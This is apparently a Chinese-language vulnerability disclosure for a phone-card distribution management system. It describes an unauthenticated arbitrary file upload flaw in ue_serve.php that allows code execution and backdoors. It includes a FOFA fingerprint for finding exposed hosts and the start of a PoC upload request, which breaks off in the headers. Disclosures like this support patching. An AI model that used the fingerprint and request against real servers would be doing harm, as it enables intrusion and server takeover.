0x01 产品简介

号卡极团分销管理系统，同步对接多平台，同步订单信息，支持敢探号一键上架，首页多套UI+商品下单页多套模板，订单查询支持实时物流信息、支持代理商自定义域名、泛域名绑定，内置敢探号、172平台、号氪云平台第三方接口以及号卡网同系统对接！

0x02 漏洞概述

号卡极团分销管理系统 ue_serve.php 存在任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。

0x03 复现环境

FOFA：icon_hash="-795291075"

0x04 漏洞复现

PoC

POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; W